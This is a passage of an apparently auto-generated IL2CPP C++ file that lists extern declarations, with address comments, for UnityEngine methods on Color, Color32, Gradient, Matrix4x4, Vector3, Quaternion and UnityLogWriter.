extern void UnityLogWriter_Init_mAA89EF0A02E3F6D2034522F8462DEC0A9D26C467 (void);
// 0x00000399 System.Void UnityEngine.UnityLogWriter::Write(System.Char)
extern void UnityLogWriter_Write_m84C3CC2A39BCB227569A7CA862364347ED6D577B (void);
// 0x0000039A System.Void UnityEngine.UnityLogWriter::Write(System.String)
extern void UnityLogWriter_Write_m0B8D2EBA5EE6845949F89ADEEC46770E14BD2EA5 (void);
// 0x0000039B System.Void UnityEngine.UnityLogWriter::Write(System.Char[],System.Int32,System.Int32)
extern void UnityLogWriter_Write_mAF2FA56268554F3AA26CBA5754F0A4BB951BC61F (void);
// 0x0000039C System.Void UnityEngine.UnityLogWriter::.ctor()
extern void UnityLogWriter__ctor_mEAC134C82FDBE3621F92519D6C163505BEFF6823 (void);
// 0x0000039D System.Void UnityEngine.Color::.ctor(System.Single,System.Single,System.Single,System.Single)
extern void Color__ctor_m3786F0D6E510D9CFA544523A955870BD2A514C8C (void);
// 0x0000039E System.Void UnityEngine.Color::.ctor(System.Single,System.Single,System.Single)
extern void Color__ctor_mCD6889CDE39F18704CD6EA8E2EFBFA48BA3E13B0 (void);
// 0x0000039F System.String UnityEngine.Color::ToString()
extern void Color_ToString_m0018DE2184B3377CCA6FBD72D5D47886DC669147 (void);
// 0x000003A0 System.String UnityEngine.Color::ToString(System.String)
extern void Color_ToString_mC29251805A0B629C1483DAE7A5BBAAC722B319D2 (void);
// 0x000003A1 System.String UnityEngine.Color::ToString(System.String,System.IFormatProvider)
extern void Color_ToString_m70AEF3634C556F6AA01FC3236226C3D27C277229 (void);
// 0x000003A2 System.Int32 UnityEngine.Color::GetHashCode()
extern void Color_GetHashCode_m2981EEA1DEFE55254945D7D03BE64D4F56BA58D0 (void);
// 0x000003A3 System.Boolean UnityEngine.Color::Equals(System.Object)
extern void Color_Equals_m24E409BF329F25774C6577F18EFD3DE1253684D6 (void);
// 0x000003A4 System.Boolean UnityEngine.Color::Equals(UnityEngine.Color)
extern void Color_Equals_mD297CAFFEBE9352C940873862FDF9A28F1F02435 (void);
// 0x000003A5 UnityEngine.Color UnityEngine.Color::op_Addition(UnityEngine.Color,UnityEngine.Color)
extern void Color_op_Addition_m39AF1619A5E6C1F698EEF20FA5FE6F3288902AAB (void);
// 0x000003A6 UnityEngine.Color UnityEngine.Color::op_Multiply(UnityEngine.Color,UnityEngine.Color)
extern void Color_op_Multiply_mF17D278EB0ABC9AEB32E829D5CA98784E0D6B66F (void);
// 0x000003A7 UnityEngine.Color UnityEngine.Color::op_Multiply(UnityEngine.Color,System.Single)
extern void Color_op_Multiply_m290BA7F5157DE3322801AAC7FA1700219EE6E664 (void);
// 0x000003A8 System.Boolean UnityEngine.Color::op_Equality(UnityEngine.Color,UnityEngine.Color)
extern void Color_op_Equality_m3A255F888F9300ABB36ED2BC0640CFFDAAEFED2F (void);
// 0x000003A9 System.Boolean UnityEngine.Color::op_Inequality(UnityEngine.Color,UnityEngine.Color)
extern void Color_op_Inequality_m4A31CEDC6B46367D219D0358AC94F5F66C3849CA (void);
// 0x000003AA UnityEngine.Color UnityEngine.Color::Lerp(UnityEngine.Color,UnityEngine.Color,System.Single)
extern void Color_Lerp_mCE0CF50E59713C5A8F6AAC2C6648CF0EDBEEB27B (void);
// 0x000003AB UnityEngine.Color UnityEngine.Color::LerpUnclamped(UnityEngine.Color,UnityEngine.Color,System.Single)
extern void Color_LerpUnclamped_mF9C5CB32C3A014F975624AD08C96FE237DC26295 (void);
// 0x000003AC UnityEngine.Color UnityEngine.Color::RGBMultiplied(System.Single)
extern void Color_RGBMultiplied_m4B3BAE4310EA98451D608E0300331012AFFF1B01 (void);
// 0x000003AD UnityEngine.Color UnityEngine.Color::get_red()
extern void Color_get_red_m27D04C1E5FE794AD933B7B9364F3D34B9EA25109 (void);
// 0x000003AE UnityEngine.Color UnityEngine.Color::get_green()
extern void Color_get_green_m336EB73DD4A5B11B7F405CF4BC7F37A466FB4FF7 (void);
// 0x000003AF UnityEngine.Color UnityEngine.Color::get_blue()
extern void Color_get_blue_m0D04554379CB8606EF48E3091CDC3098B81DD86D (void);
// 0x000003B0 UnityEngine.Color UnityEngine.Color::get_white()
extern void Color_get_white_m28BB6E19F27D4EE6858D3021A44F62BC74E20C43 (void);
// 0x000003B1 UnityEngine.Color UnityEngine.Color::get_black()
extern void Color_get_black_mBF96B603B41BED9BAFAA10CE8D946D24260F9729 (void);
// 0x000003B2 UnityEngine.Color UnityEngine.Color::get_yellow()
extern void Color_get_yellow_m1EF7276EF58050DFBA8921E2383F0249C08D346F (void);
// 0x000003B3 UnityEngine.Color UnityEngine.Color::get_cyan()
extern void Color_get_cyan_m1257FED4776F2A33BD7250357D024B3FA3E592EB (void);
// 0x000003B4 UnityEngine.Color UnityEngine.Color::get_magenta()
extern void Color_get_magenta_mF552F660CB0E42F18558AD59D516EBAC923F57E2 (void);
// 0x000003B5 UnityEngine.Color UnityEngine.Color::get_gray()
extern void Color_get_gray_mC62F535A52768B992F144E443D201F749C5DE932 (void);
// 0x000003B6 UnityEngine.Color UnityEngine.Color::get_grey()
extern void Color_get_grey_mBCECB7841257253597D826AB06E678DA43CC4298 (void);
// 0x000003B7 UnityEngine.Color UnityEngine.Color::get_clear()
extern void Color_get_clear_m8B58EA88C92F7DD2C66F0EC1BCC8AC697D631298 (void);
// 0x000003B8 UnityEngine.Color UnityEngine.Color::get_linear()
extern void Color_get_linear_m76EB88E15DA4E00D615DF33D1CEE51092683117C (void);
// 0x000003B9 System.Single UnityEngine.Color::get_maxColorComponent()
extern void Color_get_maxColorComponent_m97D2940D48767ACC21D76F8CCEAD6898B722529C (void);
// 0x000003BA UnityEngine.Vector4 UnityEngine.Color::op_Implicit(UnityEngine.Color)
extern void Color_op_Implicit_m6D1353534AD23E43DFD104850D55C469CFCEF340 (void);
// 0x000003BB UnityEngine.Color UnityEngine.Color::op_Implicit(UnityEngine.Vector4)
extern void Color_op_Implicit_m04FFC6EBCB0576CD59529546F8FA10F4F71E9005 (void);
// 0x000003BC System.Void UnityEngine.Color32::.ctor(System.Byte,System.Byte,System.Byte,System.Byte)
extern void Color32__ctor_mC9C6B443F0C7CA3F8B174158B2AF6F05E18EAC4E (void);
// 0x000003BD UnityEngine.Color32 UnityEngine.Color32::op_Implicit(UnityEngine.Color)
extern void Color32_op_Implicit_m7EFA0B83AD1AE15567E9BC2FA2B8E66D3BFE1395 (void);
// 0x000003BE UnityEngine.Color UnityEngine.Color32::op_Implicit(UnityEngine.Color32)
extern void Color32_op_Implicit_m203A634DBB77053C9400C68065CA29529103D172 (void);
// 0x000003BF System.String UnityEngine.Color32::ToString()
extern void Color32_ToString_mB1EFBF981F901A76ABF2FEA19EB290A2D8CAFC32 (void);
// 0x000003C0 System.String UnityEngine.Color32::ToString(System.String,System.IFormatProvider)
extern void Color32_ToString_m263D34787852D176627FC2B910DFE9CABAF26696 (void);
// 0x000003C1 System.IntPtr UnityEngine.Gradient::Init()
extern void Gradient_Init_m9F60BAFFC0C5DDC087C0CB0EA64F62A38D4DCD6A (void);
// 0x000003C2 System.Void UnityEngine.Gradient::Cleanup()
extern void Gradient_Cleanup_m852D91204DE7A67197754BC5EEF35BBC340795E9 (void);
// 0x000003C3 System.Boolean UnityEngine.Gradient::Internal_Equals(System.IntPtr)
extern void Gradient_Internal_Equals_m8499EFC381172FFC827366BE219C9CDA8A444D0C (void);
// 0x000003C4 System.Void UnityEngine.Gradient::.ctor()
extern void Gradient__ctor_m5EC470BB063D4831774C7CDA5D471EBEB5CE7B54 (void);
// 0x000003C5 System.Void UnityEngine.Gradient::Finalize()
extern void Gradient_Finalize_m69475357E7933E7692476BB6B8952E06EC4F23CC (void);
// 0x000003C6 System.Boolean UnityEngine.Gradient::Equals(System.Object)
extern void Gradient_Equals_m3CA73EEE2426924D75D835A69F00B9EB50D44294 (void);
// 0x000003C7 System.Boolean UnityEngine.Gradient::Equals(UnityEngine.Gradient)
extern void Gradient_Equals_m77211B56445AB40DEF32AE890BD6B13E2410FB98 (void);
// 0x000003C8 System.Int32 UnityEngine.Gradient::GetHashCode()
extern void Gradient_GetHashCode_m031DD1B99829405A1654F69EC63CFF929139C94C (void);
// 0x000003C9 UnityEngine.Vector3 UnityEngine.Matrix4x4::GetLossyScale()
extern void Matrix4x4_GetLossyScale_m3C19D2C6746BB211C8CB02478A60EB2D71D10FC7 (void);
// 0x000003CA UnityEngine.Vector3 UnityEngine.Matrix4x4::get_lossyScale()
extern void Matrix4x4_get_lossyScale_mFB3D4CF6408D710D607CA1D2AF94B2E4E0B57EB7 (void);
// 0x000003CB UnityEngine.Matrix4x4 UnityEngine.Matrix4x4::TRS(UnityEngine.Vector3,UnityEngine.Quaternion,UnityEngine.Vector3)
extern void Matrix4x4_TRS_mFEBA6926DB0044B96EF0CE98F30FEE7596820680 (void);
// 0x000003CC System.Boolean UnityEngine.Matrix4x4::Inverse3DAffine(UnityEngine.Matrix4x4,UnityEngine.Matrix4x4&)
extern void Matrix4x4_Inverse3DAffine_m12F1B34AA8BCEB2C3D72481C02064363B9202A0C (void);
// 0x000003CD UnityEngine.Matrix4x4 UnityEngine.Matrix4x4::Inverse(UnityEngine.Matrix4x4)
extern void Matrix4x4_Inverse_m4ED4E9DA31C914B4CFAFCB370A34C1AFE3C3AA2E (void);
// 0x000003CE UnityEngine.Matrix4x4 UnityEngine.Matrix4x4::get_inverse()
extern void Matrix4x4_get_inverse_m4F4A881CD789281EA90EB68CFD39F36C8A81E6BD (void);
// 0x000003CF UnityEngine.Matrix4x4 UnityEngine.Matrix4x4::Perspective(System.Single,System.Single,System.Single,System.Single)
extern void Matrix4x4_Perspective_mC8EE39379287917634B001BBA926CAFBB4B343BB (void);
// 0x000003D0 System.Void UnityEngine.Matrix4x4::.ctor(UnityEngine.Vector4,UnityEngine.Vector4,UnityEngine.Vector4,UnityEngine.Vector4)
extern void Matrix4x4__ctor_m6523044D700F15EC6BCD183633A329EE56AA8C99 (void);
// 0x000003D1 System.Single UnityEngine.Matrix4x4::get_Item(System.Int32,System.Int32)
extern void Matrix4x4_get_Item_mE4D45E661CAD3C54A02156B25F5D10585F250227 (void);
// 0x000003D2 System.Single UnityEngine.Matrix4x4::get_Item(System.Int32)
extern void Matrix4x4_get_Item_m771C2EE3A3BFFBAC9F2AD07FFCAAF6146C1BE92A (void);
// 0x000003D3 System.Int32 UnityEngine.Matrix4x4::GetHashCode()
extern void Matrix4x4_GetHashCode_m313B1AF4FEA792BB7E4D1D239EBE3257F825914D (void);
// 0x000003D4 System.Boolean UnityEngine.Matrix4x4::Equals(System.Object)
extern void Matrix4x4_Equals_m35CFC5F304BB40EFFE011B92AA87B77CD8FF8F74 (void);
// 0x000003D5 System.Boolean UnityEngine.Matrix4x4::Equals(UnityEngine.Matrix4x4)
extern void Matrix4x4_Equals_mDB0C4CCC58BE3E108F1A40BE8DBDCD62E284CC51 (void);
// 0x000003D6 UnityEngine.Matrix4x4 UnityEngine.Matrix4x4::op_Multiply(UnityEngine.Matrix4x4,UnityEngine.Matrix4x4)
extern void Matrix4x4_op_Multiply_m7649669D493400913FF60AFB04B1C19F14E0FDB0 (void);
// 0x000003D7 System.Boolean UnityEngine.Matrix4x4::op_Equality(UnityEngine.Matrix4x4,UnityEngine.Matrix4x4)
extern void Matrix4x4_op_Equality_mB6119C9802D535FE6221A40760472D06D8438B20 (void);
// 0x000003D8 UnityEngine.Vector4 UnityEngine.Matrix4x4::GetColumn(System.Int32)
extern void Matrix4x4_GetColumn_m5CE079D7A69DE70E3144BADD20A1651C73A8D118 (void);
// 0x000003D9 UnityEngine.Vector4 UnityEngine.Matrix4x4::GetRow(System.Int32)
extern void Matrix4x4_GetRow_m59C6981300C6F6927BEA17C5D095B2AD29629E9F (void);
// 0x000003DA UnityEngine.Vector3 UnityEngine.Matrix4x4::MultiplyPoint(UnityEngine.Vector3)
extern void Matrix4x4_MultiplyPoint_m20E910B65693559BFDE99382472D8DD02C862E7E (void);
// 0x000003DB UnityEngine.Vector3 UnityEngine.Matrix4x4::MultiplyPoint3x4(UnityEngine.Vector3)
extern void Matrix4x4_MultiplyPoint3x4_mACCBD70AFA82C63DA88555780B7B6B01281AB814 (void);
// 0x000003DC UnityEngine.Vector3 UnityEngine.Matrix4x4::MultiplyVector(UnityEngine.Vector3)
extern void Matrix4x4_MultiplyVector_mFD12F86A473E90BBB0002149ABA3917B2A518937 (void);
// 0x000003DD UnityEngine.Matrix4x4 UnityEngine.Matrix4x4::Translate(UnityEngine.Vector3)
extern void Matrix4x4_Translate_m95D44EDD1A9856DD11C639692E47B7A35EF745E2 (void);
// 0x000003DE UnityEngine.Matrix4x4 UnityEngine.Matrix4x4::Rotate(UnityEngine.Quaternion)
extern void Matrix4x4_Rotate_mE2C31B51EEC282F2969B9C2BE24BD73E312807E8 (void);
// 0x000003DF UnityEngine.Matrix4x4 UnityEngine.Matrix4x4::get_identity()
extern void Matrix4x4_get_identity_m94A09872C449C26863FF10D0FDF87842D91BECD6 (void);
// 0x000003E0 System.String UnityEngine.Matrix4x4::ToString()
extern void Matrix4x4_ToString_mB310BE20B7CDE8AEA91D84FCA4E75BCACF7DFC86 (void);
// 0x000003E1 System.String UnityEngine.Matrix4x4::ToString(System.String)
extern void Matrix4x4_ToString_m33E7675EAEB7F6E9DA08C49185B92063D967C7A2 (void);
// 0x000003E2 System.String UnityEngine.Matrix4x4::ToString(System.String,System.IFormatProvider)
extern void Matrix4x4_ToString_mB8E1EFF14A37605ABA321708CC36021FFBCF84CF (void);
// 0x000003E3 System.Void UnityEngine.Matrix4x4::.cctor()
extern void Matrix4x4__cctor_mC8CCD92F7684B074A1457FADB8F271447FDCC93E (void);
// 0x000003E4 System.Void UnityEngine.Matrix4x4::GetLossyScale_Injected(UnityEngine.Matrix4x4&,UnityEngine.Vector3&)
extern void Matrix4x4_GetLossyScale_Injected_mA50B5DB5D02D684235C4F58107CC1BBCBBFDCED4 (void);
// 0x000003E5 System.Void UnityEngine.Matrix4x4::TRS_Injected(UnityEngine.Vector3&,UnityEngine.Quaternion&,UnityEngine.Vector3&,UnityEngine.Matrix4x4&)
extern void Matrix4x4_TRS_Injected_mDE0AD3BD9A300FF0E7A1FC251413EFAEBC54D584 (void);
// 0x000003E6 System.Boolean UnityEngine.Matrix4x4::Inverse3DAffine_Injected(UnityEngine.Matrix4x4&,UnityEngine.Matrix4x4&)
extern void Matrix4x4_Inverse3DAffine_Injected_mC3DA8815FCDFAC684781598274FAAB54F50DDE48 (void);
// 0x000003E7 System.Void UnityEngine.Matrix4x4::Inverse_Injected(UnityEngine.Matrix4x4&,UnityEngine.Matrix4x4&)
extern void Matrix4x4_Inverse_Injected_mDFE02F04FE907C8BC49CAF9F17631EE4228CFD59 (void);
// 0x000003E8 System.Void UnityEngine.Matrix4x4::Perspective_Injected(System.Single,System.Single,System.Single,System.Single,UnityEngine.Matrix4x4&)
extern void Matrix4x4_Perspective_Injected_m159D92D81C8E7787E8FF8B7598DDC817FBB1AE61 (void);
// 0x000003E9 UnityEngine.Vector3 UnityEngine.Vector3::Slerp(UnityEngine.Vector3,UnityEngine.Vector3,System.Single)
extern void Vector3_Slerp_mBA32C7EAC64C56C7D68480549FA9A892FA5C1728 (void);
// 0x000003EA UnityEngine.Vector3 UnityEngine.Vector3::Lerp(UnityEngine.Vector3,UnityEngine.Vector3,System.Single)
extern void Vector3_Lerp_m57EE8D709A93B2B0FF8D499FA2947B1D61CB1FD6 (void);
// 0x000003EB UnityEngine.Vector3 UnityEngine.Vector3::LerpUnclamped(UnityEngine.Vector3,UnityEngine.Vector3,System.Single)
extern void Vector3_LerpUnclamped_mFEA59FB5EB455F28D302887090F5D223277686E0 (void);
// 0x000003EC UnityEngine.Vector3 UnityEngine.Vector3::MoveTowards(UnityEngine.Vector3,UnityEngine.Vector3,System.Single)
extern void Vector3_MoveTowards_m3E2E4E94093F49D09DEB34CA97BF8A632B27F1AD (void);
// 0x000003ED UnityEngine.Vector3 UnityEngine.Vector3::SmoothDamp(UnityEngine.Vector3,UnityEngine.Vector3,UnityEngine.Vector3&,System.Single,System.Single,System.Single)
extern void Vector3_SmoothDamp_mA20AB2E3DFAE680D742E9A17D969AF8A3E849711 (void);
// 0x000003EE System.Single UnityEngine.Vector3::get_Item(System.Int32)
extern void Vector3_get_Item_m163510BFC2F7BFAD1B601DC9F3606B799CF199F2 (void);
// 0x000003EF System.Void UnityEngine.Vector3::set_Item(System.Int32,System.Single)
extern void Vector3_set_Item_m79136861DEC5862CE7EC20AB3B0EF10A3957CEC3 (void);
// 0x000003F0 System.Void UnityEngine.Vector3::.ctor(System.Single,System.Single,System.Single)
extern void Vector3__ctor_m376936E6B999EF1ECBE57D990A386303E2283DE0 (void);
// 0x000003F1 System.Void UnityEngine.Vector3::.ctor(System.Single,System.Single)
extern void Vector3__ctor_m5F87930F9B0828E5652E2D9D01ED907C01122C86 (void);
// 0x000003F2 System.Void UnityEngine.Vector3::Scale(UnityEngine.Vector3)
extern void Vector3_Scale_mE0DC2C1B7902271788591F17DBE7F7F72EC37283 (void);
// 0x000003F3 UnityEngine.Vector3 UnityEngine.Vector3::Cross(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_Cross_m77F64620D73934C56BEE37A64016DBDCB9D21DB8 (void);
// 0x000003F4 System.Int32 UnityEngine.Vector3::GetHashCode()
extern void Vector3_GetHashCode_mB08429DC931A85BD29CE11B9ABC77DE7E0E46327 (void);
// 0x000003F5 System.Boolean UnityEngine.Vector3::Equals(System.Object)
extern void Vector3_Equals_mB4BE43D5986864F5C22B919F2957E0309F10E3B4 (void);
// 0x000003F6 System.Boolean UnityEngine.Vector3::Equals(UnityEngine.Vector3)
extern void Vector3_Equals_mEDEAF86793D229455BBF9BA5B30DDF438D6CABC1 (void);
// 0x000003F7 UnityEngine.Vector3 UnityEngine.Vector3::Reflect(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_Reflect_mF9DE7C28D937AB29E01378DFACF8AF6FBD9FD72C (void);
// 0x000003F8 UnityEngine.Vector3 UnityEngine.Vector3::Normalize(UnityEngine.Vector3)
extern void Vector3_Normalize_m6120F119433C5B60BBB28731D3D4A0DA50A84DDD (void);
// 0x000003F9 System.Void UnityEngine.Vector3::Normalize()
extern void Vector3_Normalize_mC749B887A4C74BA0A2E13E6377F17CCAEB0AADA8 (void);
// 0x000003FA UnityEngine.Vector3 UnityEngine.Vector3::get_normalized()
extern void Vector3_get_normalized_m736BBF65D5CDA7A18414370D15B4DFCC1E466F07 (void);
// 0x000003FB System.Single UnityEngine.Vector3::Dot(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_Dot_m4688A1A524306675DBDB1E6D483F35E85E3CE6D8 (void);
// 0x000003FC UnityEngine.Vector3 UnityEngine.Vector3::Project(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_Project_m47BC1C674D5732D50B6E136626FB2C53E18A706E (void);
// 0x000003FD UnityEngine.Vector3 UnityEngine.Vector3::ProjectOnPlane(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_ProjectOnPlane_mCAFA9F9416EA4740DCA8757B6E52260BF536770A (void);
// 0x000003FE System.Single UnityEngine.Vector3::Angle(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_Angle_m1B9CC61B142C3A0E7EEB0559983CC391D1582F56 (void);
// 0x000003FF System.Single UnityEngine.Vector3::SignedAngle(UnityEngine.Vector3,UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_SignedAngle_mD30E71B2F64983C2C4D86F17E7023BAA84CE50BE (void);
// 0x00000400 System.Single UnityEngine.Vector3::Distance(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_Distance_m99C722723EDD875852EF854AD7B7C4F8AC4F84AB (void);
// 0x00000401 System.Single UnityEngine.Vector3::Magnitude(UnityEngine.Vector3)
extern void Vector3_Magnitude_m6AD0BEBF88AAF98188A851E62D7A32CB5B7830EF (void);
// 0x00000402 System.Single UnityEngine.Vector3::get_magnitude()
extern void Vector3_get_magnitude_mF0D6017E90B345F1F52D1CC564C640F1A847AF2D (void);
// 0x00000403 System.Single UnityEngine.Vector3::SqrMagnitude(UnityEngine.Vector3)
extern void Vector3_SqrMagnitude_m04883F317B0C35E16E87523EBDFD346551290968 (void);
// 0x00000404 System.Single UnityEngine.Vector3::get_sqrMagnitude()
extern void Vector3_get_sqrMagnitude_m43C27DEC47C4811FB30AB474FF2131A963B66FC8 (void);
// 0x00000405 UnityEngine.Vector3 UnityEngine.Vector3::Min(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_Min_m669DD6A6725D796639ADF4DE40E72AE8DCCFA9C7 (void);
// 0x00000406 UnityEngine.Vector3 UnityEngine.Vector3::Max(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_Max_m8446E71C8778A1CE7C379BBF6966D15093C99145 (void);
// 0x00000407 UnityEngine.Vector3 UnityEngine.Vector3::get_zero()
extern void Vector3_get_zero_m9D7F7B580B5A276411267E96AA3425736D9BDC83 (void);
// 0x00000408 UnityEngine.Vector3 UnityEngine.Vector3::get_one()
extern void Vector3_get_one_mE6A2D5C6578E94268024613B596BF09F990B1260 (void);
// 0x00000409 UnityEngine.Vector3 UnityEngine.Vector3::get_forward()
extern void Vector3_get_forward_mEBAB24D77FC02FC88ED880738C3B1D47C758B3EB (void);
// 0x0000040A UnityEngine.Vector3 UnityEngine.Vector3::get_back()
extern void Vector3_get_back_mBA6E23860A365E6F0F9A2AADC3D19E698687230A (void);
// 0x0000040B UnityEngine.Vector3 UnityEngine.Vector3::get_up()
extern void Vector3_get_up_mAB5269BFCBCB1BD241450C9BF2F156303D30E0C3 (void);
// 0x0000040C UnityEngine.Vector3 UnityEngine.Vector3::get_down()
extern void Vector3_get_down_m19EB5B5B0EDFE9C272BD7BCC6923C4A9D616F771 (void);
// 0x0000040D UnityEngine.Vector3 UnityEngine.Vector3::get_left()
extern void Vector3_get_left_mA75C525C1E78B5BB99E9B7A63EF68C731043FE18 (void);
// 0x0000040E UnityEngine.Vector3 UnityEngine.Vector3::get_right()
extern void Vector3_get_right_m13B7C3EAA64DC921EC23346C56A5A597B5481FF5 (void);
// 0x0000040F UnityEngine.Vector3 UnityEngine.Vector3::op_Addition(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_op_Addition_m087D6F0EC60843D455F9F83D25FE42B2433AAD1D (void);
// 0x00000410 UnityEngine.Vector3 UnityEngine.Vector3::op_Subtraction(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_op_Subtraction_m1690F44F6DC92B770A940B6CF8AE0535625A9824 (void);
// 0x00000411 UnityEngine.Vector3 UnityEngine.Vector3::op_UnaryNegation(UnityEngine.Vector3)
extern void Vector3_op_UnaryNegation_m3AC523A7BED6E843165BDF598690F0560D8CAA63 (void);
// 0x00000412 UnityEngine.Vector3 UnityEngine.Vector3::op_Multiply(UnityEngine.Vector3,System.Single)
extern void Vector3_op_Multiply_m516FE285F5342F922C6EB3FCB33197E9017FF484 (void);
// 0x00000413 UnityEngine.Vector3 UnityEngine.Vector3::op_Multiply(System.Single,UnityEngine.Vector3)
extern void Vector3_op_Multiply_m29F4414A9D30B7C0CD8455C4B2F049E8CCF66745 (void);
// 0x00000414 UnityEngine.Vector3 UnityEngine.Vector3::op_Division(UnityEngine.Vector3,System.Single)
extern void Vector3_op_Division_mD7200D6D432BAFC4135C5B17A0B0A812203B0270 (void);
// 0x00000415 System.Boolean UnityEngine.Vector3::op_Equality(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_op_Equality_m15951D1B53E3BE36C9D265E229090020FBD72EBB (void);
// 0x00000416 System.Boolean UnityEngine.Vector3::op_Inequality(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Vector3_op_Inequality_m6A7FB1C9E9DE194708997BFA24C6E238D92D908E (void);
// 0x00000417 System.String UnityEngine.Vector3::ToString()
extern void Vector3_ToString_m6C24B9F0382D25D75B05C606E127CD14660574EE (void);
// 0x00000418 System.String UnityEngine.Vector3::ToString(System.String)
extern void Vector3_ToString_m3185BD544ED9BA81E88936544EC298C19207BDF1 (void);
// 0x00000419 System.String UnityEngine.Vector3::ToString(System.String,System.IFormatProvider)
extern void Vector3_ToString_mA8DA39B6324392BB93203A4D4CB85AF87231CB62 (void);
// 0x0000041A System.Void UnityEngine.Vector3::.cctor()
extern void Vector3__cctor_mDE5FA92524AC1AFCC13E3C81C93DB4F05B08B699 (void);
// 0x0000041B System.Void UnityEngine.Vector3::Slerp_Injected(UnityEngine.Vector3&,UnityEngine.Vector3&,System.Single,UnityEngine.Vector3&)
extern void Vector3_Slerp_Injected_mA7290E9A78BC8320063819903A15141FFD6395DC (void);
// 0x0000041C UnityEngine.Quaternion UnityEngine.Quaternion::FromToRotation(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Quaternion_FromToRotation_m041093DBB23CB3641118310881D6B7746E3B8418 (void);
// 0x0000041D UnityEngine.Quaternion UnityEngine.Quaternion::Inverse(UnityEngine.Quaternion)
extern void Quaternion_Inverse_m7597DECDAD37194FAC86D1A11DCE3F0C7747F817 (void);
// 0x0000041E UnityEngine.Quaternion UnityEngine.Quaternion::Slerp(UnityEngine.Quaternion,UnityEngine.Quaternion,System.Single)
extern void Quaternion_Slerp_m5FDA8C178E7EB209B43845F73263AFE9C02F3949 (void);
// 0x0000041F UnityEngine.Quaternion UnityEngine.Quaternion::SlerpUnclamped(UnityEngine.Quaternion,UnityEngine.Quaternion,System.Single)
extern void Quaternion_SlerpUnclamped_mB38920352A1B11369D782F78E183568CAFA82C0F (void);
// 0x00000420 UnityEngine.Quaternion UnityEngine.Quaternion::Internal_FromEulerRad(UnityEngine.Vector3)
extern void Quaternion_Internal_FromEulerRad_m2842B9FFB31CDC0F80B7C2172E22831D11D91E93 (void);
// 0x00000421 UnityEngine.Vector3 UnityEngine.Quaternion::Internal_ToEulerRad(UnityEngine.Quaternion)
extern void Quaternion_Internal_ToEulerRad_m9B2C77284AEE6F2C43B6C42F1F888FB4FC904462 (void);
// 0x00000422 UnityEngine.Quaternion UnityEngine.Quaternion::AngleAxis(System.Single,UnityEngine.Vector3)
extern void Quaternion_AngleAxis_m01A869DC10F976FAF493B66F15D6D6977BB61DA8 (void);
// 0x00000423 UnityEngine.Quaternion UnityEngine.Quaternion::LookRotation(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Quaternion_LookRotation_mE6859FEBE85BC0AE72A14159988151FF69BF4401 (void);
// 0x00000424 System.Void UnityEngine.Quaternion::.ctor(System.Single,System.Single,System.Single,System.Single)
extern void Quaternion__ctor_m868FD60AA65DD5A8AC0C5DEB0608381A8D85FCD8 (void);
// 0x00000425 UnityEngine.Quaternion UnityEngine.Quaternion::get_identity()
extern void Quaternion_get_identity_mB9CAEEB21BC81352CBF32DB9664BFC06FA7EA27B (void);
// 0x00000426 UnityEngine.Quaternion UnityEngine.Quaternion::op_Multiply(UnityEngine.Quaternion,UnityEngine.Quaternion)
extern void Quaternion_op_Multiply_m5AC8B39C55015059BDD09122E04E47D4BFAB2276 (void);
// 0x00000427 UnityEngine.Vector3 UnityEngine.Quaternion::op_Multiply(UnityEngine.Quaternion,UnityEngine.Vector3)
extern void Quaternion_op_Multiply_mF1348668A6CCD46FBFF98D39182F89358ED74AC0 (void);
// 0x00000428 System.Boolean UnityEngine.Quaternion::IsEqualUsingDot(System.Single)
extern void Quaternion_IsEqualUsingDot_m5C6AC5F5C56B27C25DDF612BEEF40F28CA44CA31 (void);
// 0x00000429 System.Boolean UnityEngine.Quaternion::op_Equality(UnityEngine.Quaternion,UnityEngine.Quaternion)
extern void Quaternion_op_Equality_m3DF1D708D3A0AFB11EACF42A9C068EF6DC508FBB (void);
// 0x0000042A System.Boolean UnityEngine.Quaternion::op_Inequality(UnityEngine.Quaternion,UnityEngine.Quaternion)
extern void Quaternion_op_Inequality_mC1922F160B14F6F404E46FFCC10B282D913BE354 (void);
// 0x0000042B System.Single UnityEngine.Quaternion::Dot(UnityEngine.Quaternion,UnityEngine.Quaternion)
extern void Quaternion_Dot_m4A80D03D7B7DEC054E2175E53D072675649C6713 (void);
// 0x0000042C System.Single UnityEngine.Quaternion::Angle(UnityEngine.Quaternion,UnityEngine.Quaternion)
extern void Quaternion_Angle_m445E005E6F9211283EEA3F0BD4FF2DC20FE3640A (void);
// 0x0000042D UnityEngine.Vector3 UnityEngine.Quaternion::Internal_MakePositive(UnityEngine.Vector3)
extern void Quaternion_Internal_MakePositive_m864320DA2D027C186C95B2A5BC2C66B0EB4A6C11 (void);
// 0x0000042E UnityEngine.Vector3 UnityEngine.Quaternion::get_eulerAngles()
extern void Quaternion_get_eulerAngles_m2DB5158B5C3A71FD60FC8A6EE43D3AAA1CFED122 (void);
// 0x0000042F UnityEngine.Quaternion UnityEngine.Quaternion::Euler(System.Single,System.Single,System.Single)
extern void Quaternion_Euler_mD4601D966F1F58F3FCA01B3FC19A12D0AD0396DD (void);
// 0x00000430 UnityEngine.Quaternion UnityEngine.Quaternion::Euler(UnityEngine.Vector3)
extern void Quaternion_Euler_m66E346161C9778DF8486DB4FE823D8F81A54AF1D (void);
// 0x00000431 UnityEngine.Quaternion UnityEngine.Quaternion::Normalize(UnityEngine.Quaternion)
extern void Quaternion_Normalize_m63D60A4A9F97145AF0C7E2A4C044EBF17EF7CBC3 (void);
// 0x00000432 UnityEngine.Quaternion UnityEngine.Quaternion::get_normalized()
extern void Quaternion_get_normalized_m08AB963B13A0EC6F540A29886C5ACFCCCC0A6D16 (void);
// 0x00000433 System.Int32 UnityEngine.Quaternion::GetHashCode()
